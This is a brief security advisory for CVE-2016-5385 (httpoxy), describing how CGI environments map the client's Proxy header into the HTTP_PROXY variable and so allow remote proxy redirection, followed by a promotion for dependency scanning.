CVE-2016-5385: Vulnerability in CGI applications
(updated )
httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. It comes down to a simple namespace conflict: RFC (CGI) puts the HTTP Proxy header from a request into the environment variables as HTTP_PROXY
and HTTP_PROXY
is a popular environment variable used to configure an outgoing proxy. This leads to a remotely exploitable vulnerability.
References
Detect and mitigate CVE-2016-5385 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →